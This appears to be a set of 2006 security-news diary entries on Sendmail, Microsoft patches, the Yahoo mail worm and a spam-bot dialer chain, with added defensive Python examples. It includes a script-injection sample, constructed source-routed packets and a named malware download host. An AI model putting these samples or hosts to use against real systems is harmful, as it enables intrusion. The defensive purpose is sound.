A new Sendmail vulnerability has been reported. It is caused by an error in the termination of the recursive "mime8to7()" function when performing MIME conversions: while processing a deeply nested, malformed MIME message, the sendmail process runs out of stack space and crashes. This can be exploited by malicious people to cause a DoS (Denial of Service). You can apply the patch or upgrade to version 8.13.7.

Affected versions: 8.13.6 and prior.

Additional vulnerability information can be found at the following sites.
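The failure mode above is unbounded recursion driven by attacker-controlled nesting depth. As an added example (not Sendmail's code, and not the mime8to7() function itself), the Python below builds a deeply nested multipart message, shows that a naive recursive walk exhausts the interpreter stack on it, and contrasts that with an iterative walk that enforces a depth limit before any recursive converter is allowed to touch the message. The limit value MAX_MIME_DEPTH is a constructed policy choice.

```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

MAX_MIME_DEPTH = 20   # constructed policy value for this example; real MTAs choose their own


class MimeTooDeepError(ValueError):
    """Raised when a message nests multipart containers deeper than policy allows."""


def build_nested_message(levels):
    """Construct (sample input) a multipart message nested `levels` deep around one text leaf."""
    part = MIMEText("leaf", "plain")
    for _ in range(levels):
        wrapper = MIMEMultipart("mixed")
        wrapper.attach(part)
        part = wrapper
    return part


def naive_depth(part):
    """Unbounded recursion: one stack frame per nesting level, the pattern the diary describes."""
    if not part.is_multipart():
        return 0
    return 1 + max(naive_depth(child) for child in part.get_payload())


def naive_depth_crashes(part):
    """True if the recursive walk over `part` exhausts the interpreter's stack."""
    try:
        naive_depth(part)
        return False
    except RecursionError:
        return True


def bounded_depth(part, limit=MAX_MIME_DEPTH):
    """Iterative walk with an explicit stack; rejects the message as soon as `limit` is exceeded."""
    deepest = 0
    pending = [(part, 0)]
    while pending:
        node, depth = pending.pop()
        if depth > limit:
            raise MimeTooDeepError("MIME nesting exceeds %d levels" % limit)
        deepest = max(deepest, depth)
        if node.is_multipart():
            pending.extend((child, depth + 1) for child in node.get_payload())
    return deepest


def accept_for_conversion(part, limit=MAX_MIME_DEPTH):
    """Policy hook: True only if the message is shallow enough to hand to a recursive converter."""
    try:
        bounded_depth(part, limit)
        return True
    except MimeTooDeepError:
        return False


if __name__ == "__main__":
    shallow = build_nested_message(5)
    hostile = build_nested_message(5000)
    print("shallow depth:", bounded_depth(shallow), "naive walk crashes:", naive_depth_crashes(shallow))
    print("hostile accepted:", accept_for_conversion(hostile), "naive walk crashes:", naive_depth_crashes(hostile))
```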


Published: 2006-06-15

E-mails with malicious links targeting Australia

We've received a couple of reports about e-mails being spammed which contain browser exploits. What's interesting about this is that they are targeting Australia.

All e-mails we've received have the same content, but the URL seems to be moving around. The body is pasted below:

"People starting panic withdrawals, some of the accounts were reported closed due to technical reasons, many ATMs are not operating. Does it seem that one of the Australia's greatest goes bankrupt? The full story could be found here: <URL>
Well, hope that isn't true... Anyway You'd rather check your balance..."

The URL contains obfuscated JavaScript. The JavaScript code checks which browser the user is running and redirects them to the appropriate exploit, served by a CGI script.
The JavaScript also detects whether the user is running Service Pack 2, and appends that information as a CGI parameter as well.

The following Internet Explorer vulnerabilities are exploited:


And one Mozilla Firefox vulnerability is exploited as well:


For Firefox users, there is a good add-on for preventing malicious JavaScript, called "NoScript". You can find more information at the following site:


Published: 2006-06-14

Webcast archive available

In case you missed today's ISC Threat Update, the webcast is now available as an archive:



Published: 2006-06-14

Exploits for most recent Microsoft Patches

After yesterday's patch day, we started to receive a number of reports about newly released exploits for vulnerabilities announced on Tuesday.

Here is a quick list of what we have seen so far:

MS06-024: Windows Media Player.
Exploit released by penetration testing vendor to customers.

MS06-025: RRAS
Exploit released by penetration testing vendor to customers.

MS06-027: Word remote code execution
Exploit available before release of patch.

MS06-030: SMB Privilege Escalation.
Two exploits released to the public.

MS06-032: IP Source Routing Exploit.
DoS exploits released privately (trivial exploit)

Thanks to Juha-Matti for finding the exploits!


Published: 2006-06-13

MS06-029: Script injection through Exchange/OWA

MS06-029 - KB 912442

Affected Software:
  • Microsoft Exchange 2000 Server Service Pack 3 with the August 2004 Exchange 2000 Server Post-Service Pack 3 Update Rollup
  • Microsoft Exchange Server 2003 Service Pack 1
  • Microsoft Exchange Server 2003 Service Pack 2
Impact:  Remote Code Execution
Severity:  Important
Description:  Microsoft Exchange servers running Outlook Web Access (OWA) to let clients check email remotely are exposing those clients to a script injection vulnerability.  A specially crafted email sent to the user and opened in OWA would allow the script to run.  According to Microsoft "A script injection vulnerability exists that could allow an attacker to run a malicious script. If this malicious script is run, it would run in the security context of the user on the client."  If you are running the Microsoft Exchange OWA service, it is very important that you patch ASAP.

If you have been tracking the issue with Yahoo web mail, this should sound very familiar.
The vulnerability is covered in CVE-2006-1193.

Lorna Hutcheson


Published: 2006-06-13

MS06-031: RPC Mutual Authentication Vulnerability

MS06-031 - KB 917736

This looks to be an obscure bug that only affects Windows 2000. In reality, the conditions for exploitation seem rare and no code execution is possible. The bug only affects custom RPC applications using SSL with mutual authentication, which probably doesn't amount to many applications out there. Finally, the impact of this bug only allows the attacker to impersonate a trusted RPC server - it doesn't allow code execution.
For all the overworked sysadmins, you can probably leave this at the bottom of your patch list.

This vulnerability is also covered in CVE-2006-2380.

Kyle Haugsness


Published: 2006-06-13

MS06-030: Microsoft SMB Vulnerabilities

MS06-030 - KB 914389

MS06-030 covers two vulnerabilities. The more severe one ("SMB Driver Elevation of Privilege Vulnerability") will allow an attacker who has regular user access to a system to gain administrator access. The attack requires some form of regular access, for example valid login credentials or an exploit against a regular user on the system.
You could disable the Workstation service to mitigate this vulnerability. However, this is probably only going to work for stand-alone workstations: disabling the Workstation service will break file and printer sharing.
The second vulnerability ("SMB Invalid Handle Vulnerability") results in a Denial of Service condition, but like the first vulnerability it requires valid login credentials.

This vulnerability is covered in CVE-2006-2373.

Johannes Ullrich

Published: 2006-06-13

Barracuda Networks outage statement

A number of readers have written in about problems with their Barracuda Networks mail appliances.  Barracuda Networks sent in their public statement:

    "Outage on 6/13/2006 for Barracuda Spam Firewall Customers

Barracuda Networks remains committed to open communications with our customer base.  This morning, we had an outage that affected a large number of Barracuda Spam Firewall customers.  The affected customers were Barracuda Spam Firewall customers employing the virus scan feature of the Barracuda Spam Firewall using virus definition 1.5.144.  The outage resolved itself with a subsequent Energize Update to virus definition 1.5.145.
Beginning at 4:53 AM PST today, a faulty virus definition was released that had an incomplete virus database (virus definition 1.5.144).  To protect our customers in the event such a circumstance occurred, the Barracuda Spam Firewall has a built in precautionary feature which automatically prevents email from being sent through in order to keep potentially infected emails from being delivered.  Any Barracuda Spam Firewall in the field that had received virus definition 1.5.144 immediately began to queue all incoming messages until the complete virus database became available.
At 7:02 AM PST, the majority of Barracuda Spam Firewalls automatically received virus definition 1.5.145 containing the complete virus database, and email began to process normally for those customers previously affected.
The cause of the incomplete virus definition has been identified and resolved, and additional measures have been put in place to prevent this issue from occurring in the future.
Due to the volume of calls to our Technical Support department during this period, we did experience a phone system malfunction which caused many customers to have to wait for longer periods of time than what they have come to expect.  We apologize for any delay or inconvenience this may have caused and feel confident that our support department is back online and ready to assist customers right away.
Thank you for your patience.  We look forward to continuing to provide all our customers with the same high quality service and support that they have come to rely on.
Barracuda Networks Support and Operations Teams"


Published: 2006-06-13

MS06-032: Source routing buffer overflow

MS06-032 - KB 917953

While Microsoft rates this as important only, we at the Internet Storm Center feel that it is very critical. It is easy to exploit this. One (spoofed) packet could allow an attacker to "own" a vulnerable system. The TCP/IP stack is vulnerable to a buffer overflow in the handling of source routed packets.

While some firewalls might protect from this, consider systems that are used on the road, such as in airports, hotels, ...; they must be protected now.

  • Block packets with source routing options in the firewall. According to Microsoft "IP source route options 131 and 137" are the dangerous ones, but why would you allow source routing through your firewall anyway?
  • A personal firewall might help as well.
  • Disable source routing in Windows by setting a registry key (see the Microsoft bulletin for details) [highly recommended action, even if you patched already].
This vulnerability is covered in CVE-2005-2379.
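To make the first bullet concrete, here is an added example (not code from the diary or from Microsoft) of the check a packet filter has to perform: walk the IPv4 header's option list and drop anything carrying option type 131 (LSRR) or 137 (SSRR), treating a malformed option list as a drop as well. The sample packets are constructed inline using RFC 5737 documentation addresses; the header checksum is left at zero because the decision does not depend on it.

```python
import socket
import struct

# IPv4 option type codes; 131 and 137 are the two Microsoft names for MS06-032.
IPOPT_EOL = 0     # end of option list
IPOPT_NOP = 1     # no-operation padding
IPOPT_LSRR = 131  # loose source and record route
IPOPT_SSRR = 137  # strict source and record route
SOURCE_ROUTE_OPTIONS = {IPOPT_LSRR: "LSRR", IPOPT_SSRR: "SSRR"}


def parse_ipv4_options(packet):
    """Return a list of (option_type, option_data) from the IPv4 header of `packet`.

    Raises ValueError for anything that is not a well-formed IPv4 header, so the
    caller can treat malformed headers as suspicious instead of passing them.
    """
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    version, ihl_words = packet[0] >> 4, packet[0] & 0x0F
    if version != 4:
        raise ValueError("not an IPv4 packet")
    header_len = ihl_words * 4
    if header_len < 20 or header_len > len(packet):
        raise ValueError("bad IHL %d" % ihl_words)
    opts = packet[20:header_len]
    options = []
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == IPOPT_EOL:
            break
        if kind == IPOPT_NOP:          # single-byte option, no length field
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("option %d has no length byte" % kind)
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("option %d has bad length %d" % (kind, length))
        options.append((kind, bytes(opts[i + 2:i + length])))
        i += length
    return options


def classify_packet(packet):
    """Filter decision for one packet: 'pass', 'drop:LSRR', 'drop:SSRR' or 'drop:malformed'."""
    try:
        options = parse_ipv4_options(packet)
    except ValueError:
        return "drop:malformed"
    for kind, _data in options:
        if kind in SOURCE_ROUTE_OPTIONS:
            return "drop:" + SOURCE_ROUTE_OPTIONS[kind]
    return "pass"


def build_ipv4_header(src, dst, options=b""):
    """Construct a sample IPv4 header (no payload, checksum left zero) to exercise the filter."""
    options += b"\x00" * ((-len(options)) % 4)   # options area is padded to 32-bit words
    ihl_words = 5 + len(options) // 4
    fixed = struct.pack("!BBHHHBBH4s4s",
                        (4 << 4) | ihl_words, 0, 20 + len(options), 0, 0,
                        64, 6, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return fixed + options


def source_route_option(kind, hops):
    """Encode an LSRR/SSRR option: type, length, pointer (4 = first address), hop addresses."""
    addrs = b"".join(socket.inet_aton(h) for h in hops)
    return bytes([kind, 3 + len(addrs), 4]) + addrs


# Constructed sample packets for the example.
PLAIN = build_ipv4_header("192.0.2.10", "198.51.100.20")
LOOSE = build_ipv4_header("192.0.2.10", "198.51.100.20",
                          source_route_option(IPOPT_LSRR, ["203.0.113.1"]))
STRICT = build_ipv4_header("192.0.2.10", "198.51.100.20",
                           b"\x01\x01" + source_route_option(IPOPT_SSRR, ["203.0.113.1", "203.0.113.2"]))
BROKEN = build_ipv4_header("192.0.2.10", "198.51.100.20", bytes([IPOPT_LSRR, 0]))

if __name__ == "__main__":
    for name, pkt in [("plain", PLAIN), ("lsrr", LOOSE), ("nop+ssrr", STRICT), ("broken", BROKEN)]:
        print("%-9s %s" % (name, classify_packet(pkt)))
```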

Swa Frantzen -- section 66


Published: 2006-06-13

MS06-025: RRAS arbitrary code execution

MS06-025 - KB 911280

A CRITICAL vulnerability in Microsoft's Routing and Remote Access Services (RRAS). A successful exploit could allow an attacker to execute arbitrary code. In order to exploit the vulnerability remotely, an attacker has to be able to log in to a system first.
RRAS is used to connect to Microsoft networks remotely via dial-up modems. With RRAS, a user can dial up to a remote network (e.g. a corporate network) and access all services on the remote network as if connected locally. In addition, RRAS is used for various multi-protocol LAN/WAN connections via VPNs.
It is not clear how exactly the exploit would occur over a network, or what the traffic will look like. We will update this diary later once we have figured it out. According to this list, RRAS uses port 1701/UDP (L2TP), 1723/TCP (PPTP), as well as protocols 47 (GRE), 51 (AH) and 50 (ESP). In particular, the protocols other than TCP/UDP may not be blocked by all firewalls.
For most users, the best option is to disable the service. See the bulletin on how to do this. Double check that you have disabled all guest accounts or other accounts that allow connections with no or weak passwords.

Johannes Ullrich


Published: 2006-06-13

MS06-011 Updated

MS06-011 - KB 914798

This update was originally released in March.  Our analysis at the time is located here.

The bulletin was re-released today with a number of tweaks.  "This update has been revised to include updated registry key values for the NetBT, RemoteAccess, and TCPIP services. These values have been modified to be the same as Windows XP Service Pack 2 on Windows XP Service Pack 1 systems, and the same as Windows 2003 Service Pack 1 on Windows 2003 systems with no service pack applied. Customers are encouraged to apply this revised update for additional security from privilege elevation through these services as described in the Vulnerability Details section of this security bulletin."

Scott Fendley - Univ of Arkansas


Published: 2006-06-13

MS06-028: PowerPoint malformed record / Remote Code Execution

MS06-028 - KB 916768

Vulnerable: Office 2000, XP, 2003 for Windows and Office v.X and Office 2004 for Mac (yes, this vulnerability is present on Mac systems)

This vulnerability affects PowerPoint documents and allows for remote code execution with the privileges of the logged in user.  A malicious PowerPoint document with a malformed record can corrupt system memory and be used to execute code.  This patch replaces MS06-010 for PowerPoint 2000.

An attacker would have to somehow convince a victim to open a malicious PowerPoint file to exploit this vulnerability (either by e-mail or web download, for instance).  If the user is logged in as administrator, an attacker would gain full control of the system.  Presumably, different malicious PowerPoint files would have to be created to exploit Windows and Mac (i.e. the same PowerPoint file would likely not be able to exploit both operating systems).

This patch is classified critical for PowerPoint 2000 only, and important for all other versions (including Mac).  This patch fixes the vulnerability detailed in CVE-2006-0022.  Users are advised to apply this patch if they use Microsoft PowerPoint.

John Bambenek -- University of Illinois


Published: 2006-06-13

MS06-024: buffer overflow in windows media player

MS06-024 - KB 917734

Windows Media Player is vulnerable in its handling of PNG images.

Microsoft rates this vulnerability as critical. It allows remote code execution.
Attack vectors via both email and the web are possible through the use of .wmz files.

Workarounds will be based on content filtering in gateways, but may fall short in effectiveness if you count encrypted messages and the like as possible exploit vectors.

Swa Frantzen -- section 66


Published: 2006-06-13

MS06-027: MS Word object pointer / Remote Code Execution

MS06-027 - KB 919637

Vulnerable: Word 2000 (including Word Viewer 2003) and better and Works 2000 and better
Not Vulnerable: Word for Mac

This is a remote code execution vulnerability that uses a malformed object pointer to corrupt system memory and can be used to execute arbitrary code.  If the user logged in has administrative privileges, the exploit will run with those same privileges and could take complete system control.

In order to successfully exploit this vulnerability, an attacker would have to persuade a user to open a malicious Word document, either through e-mail or a web page.  This vulnerability is marked critical and Microsoft Office users should apply the patch immediately.

It is possible to not log in with an administrator-level account, but that would not prevent "spyware" classes of attacks.

John Bambenek -- University of Illinois


Published: 2006-06-13

Microsoft patch day

Microsoft is releasing today 12 new security bulletins:
  • MS06-021 Cumulative patch for Internet Explorer - Critical
  • MS06-022 ART image library buffer overflow - Critical
  • MS06-023 Microsoft JScript memory corruption - Critical
  • MS06-024 Windows media player - Critical
  • MS06-025 RRAS - Critical
  • MS06-026 Graphics rendering engine remote code execution - Critical
  • MS06-027 Word remote code execution - Critical
  • MS06-028 Powerpoint remote code execution -Critical
  • MS06-029 Exchange - Important
  • MS06-030 SMB privilege escalation - Important
  • MS06-031 RPC mutual authentication spoofing - Moderate
  • MS06-032 IP source routing allows remote code execution - Important
and re-released one:
Handlers actively working on these include Arrigo, John, Kyle, Lorna, Johannes, Scott and Swa.


Published: 2006-06-13

MS06-026: Graphics Rendering Engine / Remote Code Execution

MS06-026 - KB 918547

** This vulnerability ONLY applies to Windows 98, 98SE, and ME (We aren't still running these, are we?).  Windows 2000, XP and beyond are not vulnerable **

This is a critical vulnerability in the Graphics Rendering Engine that allows remote code execution on the target system using specifically crafted WMF files.  When successfully exploited, the target system can be completely compromised.  This is a new vulnerability not associated with the WMF vulnerabilities from earlier this year.  An attacker can exploit this vulnerability by using a specifically crafted webpage (and getting the victim to view that page) or by sending an exploit in email (where the email reader renders images).

If you are running Windows 98, 98SE, or ME, you should upgrade your operating system to Windows 2000, XP or later.  If you cannot upgrade, this patch should be installed immediately.

John Bambenek -- University of Illinois


Published: 2006-06-13

MS06-023: Microsoft's JScript remote code execution

MS06-023 - KB 917344

A problem in JScript where it releases memory too soon can cause memory corruption and lead to remote code execution.

The attack vector is web based: visiting malicious content is sufficient to exploit the browser. This is strongly linked with MS06-021 and Microsoft recommends installing both at the same time.

Obviously it's better not to log in with administrative rights as it makes the impact of these vulnerabilities a lot worse.

Swa Frantzen -- section 66


Published: 2006-06-13

MS06-022: buffer overflow in ART image rendering library

MS06-022 - KB 918439

ART is an image file format (yep, image formats are still popular research topics for hackers, it seems). The format is used by AOL.

The impact is that users logged in with administrative rights are exposed to remote code execution.

Microsoft rates this vulnerability as critical.

The patch removes support for ART image files from MSIE, as such they will not be rendered any longer.

It's interesting to note that the image library is an optional install on windows 2000.

  • Do not log in as administrator or with an account with administrative rights; it's dangerous.
  • Consider switching to an alternative browser. They work really well, and it makes the lives of the hackers harder if not all of us use the same browser with the same vulnerabilities.

Swa Frantzen -- section 66


Published: 2006-06-13

MS06-021: Internet Explorer patch

MS06-021 - KB 916281

Fixes memory corruption that can lead to remote code execution, disclosure of sensitive information and creation of additional accounts on the host operating system.

Microsoft rates this patch as critical; considering an impact of remote code execution on the client system, for a browser we would rate such a thing as very critical.

Microsoft claims the attack vector has to be web based; exploiting it through Outlook should not be possible.

Please note that this patch affects the issues in KB 917425 by terminating the compatibility period.

This includes a fix for publicly known bugs: CSS cross domain information disclosure (CVE-2005-4089) and  address bar spoofing (CVE-2006-1626).

Swa Frantzen -- section 66


Published: 2006-06-13

Javascript/AJAX/Worm Like Behavior

We have seen the Yamanner worm spread throughout Yahoo over the past few days.  This worm manages to spread without the user doing anything other than viewing a malicious email.  Yahoo, to its credit, had already fixed the flaw in its new beta client.

Software developers and webmasters alike should take this as a warning: new exploits will be coming that use JavaScript and AJAX-like behavior to spread.  The current worm could be readily modified to spread across many systems that do not escape JavaScript when displaying data from a foreign source. Many web developers should re-examine their code and make sure that display functions do not deliver potentially malicious code.

After testing several popular web applications, we have found that several are in fact vulnerable to the very same type of exploit. Good coding practices, verifying that users are coming from an authorized form and that they are not submitting malicious code can protect developers against this type of exploit.
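The two practices named above, escaping foreign data before display and checking that a submission came from your own form, are the same ones that would have blunted both the OWA script injection (MS06-029) and the Yamanner worm. As an added example (not Yahoo's, Microsoft's or the diary's code), the Python below shows a webmail renderer in its flawed and hardened forms, plus an HMAC-bound form token with a constant-time check on the "send" action. INBOUND, SECRET and SESSION are constructed sample values; the payload in the body is a harmless alert() stand-in for worm code.

```python
import hashlib
import hmac
import html

# Constructed inbound message, as a webmail front end might fetch it for display.
# The body carries markup of the kind a self-propagating webmail worm relies on.
INBOUND = {
    "from": "someone@example.com",
    "subject": "New Graphic site",
    "body": 'Check this out <script>alert("runs in the reader\'s session")</script>',
}

SECRET = b"constructed-server-secret-do-not-reuse"   # constructed for the example
SESSION = "session-abc123"                            # constructed session id


def render_unsafe(msg):
    """The flawed pattern: sender-controlled fields are pasted straight into the page."""
    return '<div class="mail"><b>%s</b>: %s<p>%s</p></div>' % (
        msg["from"], msg["subject"], msg["body"])


def _esc(text):
    """HTML-escape for element content and quoted attributes (&, <, >, ", ')."""
    return html.escape(text, quote=True)


def render_safe(msg):
    """Hardened form: every foreign field is escaped, so markup is displayed, never executed."""
    return '<div class="mail"><b>%s</b>: %s<p>%s</p></div>' % (
        _esc(msg["from"]), _esc(msg["subject"]), _esc(msg["body"]))


def contains_script_tag(rendered):
    """Review check: does the rendered page still contain a live <script> element?"""
    return "<script" in rendered.lower()


def mint_form_token(secret, session_id):
    """Token embedded in our own 'send' form, bound to the session with an HMAC."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def form_is_authorized(secret, session_id, submitted_token):
    """True only if the POST carries the token issued to this session (constant-time compare)."""
    expected = mint_form_token(secret, session_id)
    return hmac.compare_digest(expected, submitted_token or "")


def handle_send(secret, session_id, form):
    """Server side of 'send mail': refuse requests that did not originate from our form."""
    if not form_is_authorized(secret, session_id, form.get("token")):
        return 403, "rejected: request did not come from an authorized form"
    return 200, "queued"


if __name__ == "__main__":
    print(render_unsafe(INBOUND))
    print(render_safe(INBOUND))
    good = {"to": "friend@example.com", "token": mint_form_token(SECRET, SESSION)}
    forged = {"to": "everyone@example.com"}    # script-driven POST that lacks our token
    print(handle_send(SECRET, SESSION, good))
    print(handle_send(SECRET, SESSION, forged))
```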

We will be sending notice to affected software vendors that we have identified at this time, however we currently do not have plans to publish specific applications until new releases/patches are available.


Published: 2006-06-12

Yahoo! mass-mailer

A Yahoo! mass-mailer is currently making the rounds with a subject of "New Graphic site".

It was first reported to the ISC at 12:32 UTC and now appears to be circulating in two slightly different variants.  Analysis by Lorna and myself shows that both variants are flawed therefore they spread very effectively but do not actually perform the intended action.  The mass-mailer attempts to open a browser window to www.lastdata.com but a spelling mistake prevents this from working.  The website appears to be dormant and rejecting accesses.

The release of a new version barely two hours after we started our analysis which partially fixes the first version indicates that the code is very much under development and you should assume that the remaining bugs will be rapidly ironed out.

To activate the mass-mailer it is sufficient to open the mail message without clicking on the attachment and it will scour your address list and send itself as an attachment (forwarded message) to everyone on it.  It searches for both @yahoo.com and @yahoogroups.com e-mail addresses.

There is currently no trivial fix for Yahoo! Mail, as turning off JavaScript in the browser will prevent you from reading your e-mail.  For Yahoo! Groups it is recommended that moderators/administrators turn off attachments for the time being to prevent this from spreading further.


Published: 2006-06-12

SANSFIRE: Internet Storm Center Training Event

In case you missed it: it's only one month until the start of SANSFIRE! SANSFIRE will be your best opportunity to meet various handlers (about 15 will attend) and learn about what they are involved in at the ISC. In addition to a large number of training classes (18 week-long classes, 13 one- and two-day classes), we have a number of exciting evening talks scheduled. So if you are interested: this is the week to get your boss's approval and set up your travel plans.

SANSFIRE will run from July 5th-13th in Washington DC (a great opportunity to arrive on the 4th and watch the fireworks). For details, see the course overview and the SANS@Night schedule as well as the special event schedule.


Published: 2006-06-10

Microsoft Upcoming Bulletins Release

In the recent Microsoft Security Bulletin Advance Notification release, Microsoft announced that it will release several security updates in the upcoming security bulletin release cycle (13 Jun 06). These include:

1) Nine Microsoft Security Bulletins affecting Microsoft Windows. The highest Maximum Severity rating for these is Critical.

Prior to the release of the bulletins, Microsoft encourages administrators to review the following articles and take appropriate steps for their environment:
Microsoft Security Advisory 912945 (Non-Security Update for Internet Explorer)
Microsoft Knowledge Base Article 912945 (Internet Explorer ActiveX update)
Microsoft Knowledge Base Article 917425 (Internet Explorer ActiveX compatibility patch for Mshtml.dll)
Information for Developers about Internet Explorer

According to Microsoft, users who apply the security update will receive the ActiveX update regardless of whether they have applied the compatibility patch.

2) One Microsoft Security Bulletin affecting Microsoft Exchange. The highest Maximum Severity rating for this is Important.

As the update will include the functionality change (Microsoft Knowledge Base Article 912918 - Users cannot send e-mail messages from a mobile device or from a shared mailbox in Exchange 2000 Server and in Exchange Server 2003), administrators are urged to review the Knowledge Base article prior to release and take steps appropriate for their environment.

3) Two Microsoft Security Bulletins affecting Microsoft Office. The highest Maximum Severity rating for these is Critical.

4) One non-security High-Priority Update for Windows on Windows Update (WU) and Software Update Services (SUS).

5) Two non-security High-Priority Updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).

6) An updated version of the Microsoft Windows Malicious Software Removal Tool.


Published: 2006-06-09

MS06-015 will not provide patch for windows 98 and ME.

Microsoft announced that they will not provide a patch for Windows 98 and ME for MS06-015 "Vulnerability in Windows Explorer Could Allow Remote Code Execution (908531)".  The choice appears to be related to the amount of effort needed to patch the problem and the fact that those operating systems reach the end of their lifecycle on June 11th.
The suggested workaround is blocking incoming traffic to TCP port 139 on any unpatched systems.  This should at best be a temporary step; unsupported operating systems are a greater liability than supported ones.
Many thanks to everyone that sent us a pointer to this story.

More details can be found at:


Published: 2006-06-09

Ethereal becomes Wireshark

A few readers wrote to us about Ethereal becoming Wireshark. The packet analyzer is widely used by network and security professionals. It sounds like Gerald Combs, the developer of Ethereal, is joining CACE Technologies, the creator of WinPcap; hopefully this will make things better for both products. Wireshark can now be found at http://www.wireshark.org/


Published: 2006-06-09

WinGate Update

As we reported on June 7th, there is a vulnerability with a working exploit in QBik WinGate.  The exploit says it's for "QBik Wingate version remote exploit for Win2k SP4 (german)".

Melvin wrote to let us know that an updated version (6.1.3) is now available from http://www.wingate.com/download.php.

Thanks, Melvin!


Published: 2006-06-09

Numbers Spam Solved

The source of the 'Numbers Spam' has been publicly revealed.  It's a variant of the Bagel/Beagle/Toosoo/... virus.  Symantec is calling it "Beagle.FC".  Many thanks to everyone who sent in their thoughts about this one.


Published: 2006-06-07

phpBB 2.0.21

phpBB version 2.0.21 was released.
There are some minor security improvements in the code; check the announcement for more details. Most of the code changes appear to be more functionality oriented than security oriented.

Considering the level of attention phpBB gets from the bad guys out there, it's best not to hesitate for long and upgrade really soon.

Swa Frantzen - Section 66


Published: 2006-06-07

WinGate HTTP proxy vulnerability, remote DoS & Code Execution

There was a vulnerability/exploit announcement on Full Disclosure today for QBik WinGate; the exploit says it's for "QBik Wingate version remote exploit for Win2k SP4 (german)".

Information is available here:

ISS rates this High Risk
WinGate HTTP proxy buffer overflow

Secunia - WinGate WWW Proxy Server Buffer Overflow Vulnerability

I do not see patch information available at this time.


Published: 2006-06-06

A malware jungle


We got an interesting piece of malware from one of our readers, Robert. Robert detected one of his systems trying to connect to port 25 on various servers around the world. As this immediately screams "spam bot", Robert decided to analyze the box further.

He captured some packets (you know that we at ISC love to analyze network traffic) and found an interesting binary that he submitted to us for analysis.


55e30602f27fa4272c3bd2dd9d701224  extdrvr.exe

Received results for file: extdrvr.exe
Antivirus            Version          Last update   Result
AntiVir                               06.06.2006    no virus found
Authentium           4.93.8           06.06.2006    no virus found
Avast                4.7.844.0        06.06.2006    no virus found
AVG                  386              06.06.2006    no virus found
BitDefender          7.2              06.06.2006    no virus found
CAT-QuickHeal        8.00             06.06.2006    no virus found
ClamAV               devel-20060426   06.06.2006    no virus found
DrWeb                4.33             06.06.2006    no virus found
eTrust-InoculateIT   23.72.29         06.06.2006    no virus found
eTrust-Vet           12.6.2244        06.06.2006    no virus found
Ewido                3.5              06.06.2006    no virus found
Fortinet                              06.06.2006    no virus found
F-Prot               3.16f            06.06.2006    no virus found
Ikarus                                06.06.2006    no virus found
Kaspersky                             06.06.2006    no virus found
McAfee               4778             06.06.2006    no virus found
Microsoft            1.1441           06.07.2006    no virus found
NOD32v2              1.1582           06.06.2006    no virus found
Norman               5.90.17          06.06.2006    no virus found
Panda                                 06.06.2006    Suspicious file
Sophos               4.05.0           06.06.2006    no virus found
Symantec             8.0              06.06.2006    no virus found
TheHacker                             06.05.2006    no virus found
UNA                  1.83             06.06.2006    no virus found
VBA32                3.11.0           06.06.2006    no virus found

After analyzing this binary, we discovered a malware jungle. This is what's happening:

extdrvr.exe is the spam bot that Robert detected. This malware is particularly nasty: at the time we were writing this diary, just one of the 26 anti-virus programs on VirusTotal found it suspicious.
When executed, the spam bot connects to spm.freecj.com and asks for the list of e-mail addresses to send spam to, together with the e-mail body. Immediately after this is downloaded, it tries to send the spam.

But that's not all. The malware also downloads other Trojan downloaders which, in turn, download other stuff.

The first downloader that the main spam bot downloads is [REMOVED]/d1.html. This downloader will in turn download a pretty nasty dialer (so, making money *is* behind all this) from a well known malware network (which some of you have probably already filtered): [REMOVED].exe.
The dialer makes itself persistent across reboots and sets the RasMan and TapiSrv services to start automatically at boot.
The dialer also gets the number it should call from [REMOVED]/getnumtemp.asp?nip=0.

0815205b98f2449de6db9b89cfae6f24  d1.html
3a62b9180ae98b9ad32980d0fbe1aa72  [REMOVED].exe

If this wasn't enough, prepare for more. The dialer will now download another downloader (are we getting lost in all this?), [REMOVED]. We're not completely sure what this downloader does, as it downloads about 14kb of data from various sites, but this data seems to be encrypted. When we get more information about this, we'll update the diary.

1083e1401bc49ff8c167e912a3555c20  [REMOVED]

Back to the spam bot. What's interesting is that it downloads and replaces the machine's hosts file. Big deal, we've seen that a million times. But besides all the standard AV vendors' web sites and Microsoft Windows Update, the newly downloaded hosts file also prevents the user from visiting about 50 .biz sites well known for spreading malware (for example, www.iframebiz.biz, www.toolbarbiz.biz, etc.). Trying to eliminate the competition here?


As always, learning lessons is the most important part of handling incidents. Anti-virus obviously doesn't do much for you when the malware is not detected, so we should learn not to place all our trust in that channel for detecting malware. Robert detected this piece of malware through an IDS and correlation of logs. Monitoring your outgoing traffic, even in the absence of an IDS, could do the trick. Looking for spikes in outgoing email is a good way to detect unexpected spam bots such as these. The blocking of the traditional sites using a hosts file is also a good thing to build monitoring for: if it gets used you know there's something going on, and a second look will be well spent effort.
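A hosts-file check of the kind the previous paragraph suggests, added here as an example and not code from the diary: it parses a hosts file and flags update/AV domains that are pinned to any address at all, plus any other name sunk to loopback or 0.0.0.0. The watched-domain list and the sample hosts file are constructed for this example.

```python
import ipaddress
import re

# Domains a healthy workstation should never have pinned in its hosts file.
# Illustrative list for this example, not the set the malware in the diary used.
WATCHED_DOMAINS = {
    "windowsupdate.microsoft.com",
    "update.microsoft.com",
    "www.symantec.com",
    "www.mcafee.com",
    "www.sophos.com",
    "www.kaspersky.com",
}

# A hosts file as a spam bot might have rewritten it (constructed sample).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1       windowsupdate.microsoft.com
127.0.0.1       www.symantec.com  www.mcafee.com
0.0.0.0         www.iframebiz.biz
10.1.2.3        intranet.example.internal   # legitimate local entry
"""


def parse_hosts(text):
    """Yield (ip, hostname) pairs, skipping blank lines, comments and junk."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"\s+", line)
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # first token is not an address; not a hosts entry
        for host in parts[1:]:
            yield ip, host.lower()


def suspicious_entries(text, watched=WATCHED_DOMAINS):
    """Return (hostname, reason) for entries that hijack name resolution.

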